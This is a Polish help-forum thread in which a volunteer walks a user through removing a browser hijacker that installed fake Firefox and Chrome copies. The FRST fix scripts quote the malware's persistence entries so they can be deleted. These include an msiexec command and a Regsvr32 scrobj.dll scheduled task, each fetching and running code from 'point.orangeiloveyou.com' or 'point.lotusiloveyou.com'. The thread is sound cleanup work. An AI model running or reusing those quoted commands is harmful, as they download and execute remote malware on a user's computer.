monika83 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Dzień dobry, W trakcie korzystania z przeglądarki chrom (konkretnie ze strony xxx.fera.pl) przeglądarka została zamknięta a program kaspersky wyświetlił komunikaty o blokowaniu stron. Po ponownym uruchomieniu przeglądarki jako strona startowa pojawiła się xxx.funnysearching.com. Od tego momentu kaspersky pokazuje komunikaty o blokowaniu hxxp://d2xvc2nqkduarq.cloudfront.net/zr/js/ncbs. Zauważyłam również na pulpicie ikonę mozilli firefox, z której nie korzystam i nie pamiętam abym ją instalowała (na liście w "odinstaluj program" nie ma mozilli). Nie wiem czy może to mieć jakiś związek z powyższym problemem ale od ok. miesiąca, sporadycznie, po uruchomieniu komputera działa przeglądarka chrom ale nie działa menadżer plików, albo odwrotnie. Zdarza się to rzadko i po zrestartowaniu komputera problem ustępuje. Załączam wymagane logi (plus skanowanie kasperkym). Będę bardzo wdzięczna za pomoc. Pozdrawiam Monika Addition.txt FRST.txt gmer.txt kaspersky.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 (edytowane) Samoinstalująca się przeglądarka FireFox to fałszywka przeglądarki Mozilla FireFox. Do tego przeglądarka Google Chrome również została sfałszowana (ale poprzez dodanie niepoprawnej ścieżki do uruchamiania złej wersji, poprawna występuje również). Przechodzimy do akcji. Do poczytania, obowiązkowo: KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q IFEO\taskmgr.exe: [Debugger] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye RemoveDirectory: C:\Users\monic\AppData\Local\Doeye R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox RemoveDirectory: C:\Users\monic\AppData\Local\Firefox RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\monic\Desktop\GIMP 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). doeye;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Edytowane 27 Kwietnia 2017 przez Miszel03 Odnośnik do komentarza
monika83 Opublikowano 26 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Czy jest możliwe, że FRST od godziny wyświetla "tworzenie punktu przywracania. Proces może zająć kilka minut. proszę czekaj...." a zielony suwaczek stoi w miejscu??? Odnośnik do komentarza
Zappa Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Czy jest możliwe, że FRST od godziny wyświetla "tworzenie punktu przywracania. Proces może zająć kilka minut. proszę czekaj...." a zielony suwaczek stoi w miejscu??? Sprawdź w folderze z którego urzuchamiałaś FRST, C:\Users\monic\Downloads czy masz plik fixlog.txt. Jeśli jest to go przedstaw. Odnośnik do komentarza
monika83 Opublikowano 26 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 jest taki plik Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Nic się nie wykonało, przetwórz skrypt jeszcze raz, ale tym razem taki (ucięte problematyczne wejście). CloseProcesses:HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /qIFEO\taskmgr.exe: [Debugger] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\DoeyeRemoveDirectory: C:\Users\monic\AppData\Local\DoeyeR2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\FirefoxRemoveDirectory: C:\Users\monic\AppData\Roaming\FirefoxRemoveDirectory: C:\Users\monic\AppData\Local\Firefox RemoveDirectory: C:\Users\monic\AppData\LocalLow\MozillaR2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dllC:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnkC:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnkC:\Users\Public\Desktop\Google Chrome.lnkFirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exeFirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exeFirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exeC:\Users\monic\Desktop\GIMP 2.lnkC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnkC:\Users\Public\Desktop\Mozilla Firefox.lnkEmptyTemp: Odnośnik do komentarza
monika83 Opublikowano 26 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Jak uruchomiłam jeszcze raz to poszło to z "problematycznym wejściem". Wszystko mam nadzieję wykonałam zgodnie z instrukcją. Lekturę obowiązkową również przeczytałam (już chyba nigdy nic nie będę ściągać...). Addition.txt AdwCleanerC0.txt Fixlog.txt FRST.txt SearchReg.txt Odnośnik do komentarza
Miszel03 Opublikowano 27 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Wszystko pomyślnie wykonane. Do kasacji zostały szczątkowe klucze od fałszywych przeglądarek. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Użycie odpowiednich komend.W oknie konsoli komend wklej poniższą komendę. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye" /f reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Doeye" /f reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox" /f reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Firefox" /f Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system. 3. Skasuj ręcznie ten plik przez SHIFT + Delete (omijanie kosza) C:\Users\monic\AppData\Roaming\Mozilla. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Podsumuj obecny stan systemu. Odnośnik do komentarza
monika83 Opublikowano 27 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Chyba nie usunęło mi się wszystko... poniżej co mi wyskoczyło: C:\Users\monic>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye" /f ERROR: Odmowa dostępu. C:\Users\monic>reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Doeye" /f Operacja ukończona pomyślnie. C:\Users\monic>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox" /f ERROR: Odmowa dostępu. C:\Users\monic>reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Firefox" /f Operacja ukończona pomyślnie. Odnośnik do komentarza
Miszel03 Opublikowano 27 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Zapuść proszę taki skrypt do FRST. DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox Reboot: Dostarcz tylko plik Fixlog, by sprawdzić wykonanie. Zapis i wykonanie skryptu tak jak poprzednio. Odnośnik do komentarza
monika83 Opublikowano 27 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 plik załączony. Niestety nie widzę tego "C:\Users\monic\AppData\Roaming\Mozilla" . Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 27 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Przejdź do następnych punktów. Odnośnik do komentarza
monika83 Opublikowano 27 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Raport załączony. Tego nie widzę zatem nie skasowałam "C:\Users\monic\AppData\Roaming\Mozilla". mb.txt Odnośnik do komentarza
Miszel03 Opublikowano 28 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 Wszystkie zagrożenia wykryte przez MBAM daj do kasacji. Proszę znowu o podsumowanie obecnego stan systemu. Odnośnik do komentarza
monika83 Opublikowano 28 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 Wszystkie zagrożenia wykryte przez MBAM daj do kasacji. Proszę znowu o podsumowanie obecnego stan systemu. Zagrożenia wykryte przez MBAM wykasowane. System uruchamia się znacznie szybciej, zamyka również. Nie ma problemu, że nie działa chrom albo menadżer plików. W kasperskim mam komunikat: "legalne oprogramowanie, które może zostać użyte w celu uszkodzenia Twojego komputera lub prywatnych danych. C:\Users\monic\AppData\Local\Doeye\User Data\Default\Cache\f_000198" - nie wiem z kiedy to jest. Nie wiem czy ma to znaczenie ale na pulpicie ikona Dropbox nie ma znaczka tylko jest białą kartką. Odnośnik do komentarza
Miszel03 Opublikowano 28 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 Zagrożenia wykryte przez MBAM wykasowane. OK. System uruchamia się znacznie szybciej, zamyka również. Nie ma problemu, że nie działa chrom albo menadżer plików. OK. W kasperskim mam komunikat: "legalne oprogramowanie, które może zostać użyte w celu uszkodzenia Twojego komputera lub prywatnych danych. C:\Users\monic\AppData\Local\Doeye\User Data\Default\Cache\f_000198" - nie wiem z kiedy to jest. Tj. alert dot. wykrycia fałszywej przeglądarki, która została przeze już usunięte (= alert późniejszy). Nie wiem czy ma to znaczenie ale na pulpicie ikona Dropbox nie ma znaczka tylko jest białą kartką. Taki program nie jest w ogóle zainstalowany - napraw bądź zainstaluj program na nowo. Myślę, że od strony tego działu możemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Odnośnik do komentarza
monika83 Opublikowano 29 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 29 Kwietnia 2017 Zrobione, wykasowane narzędzia i wszystko zaktualizowane. Bardzo dziękuję za pomoc!!! Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się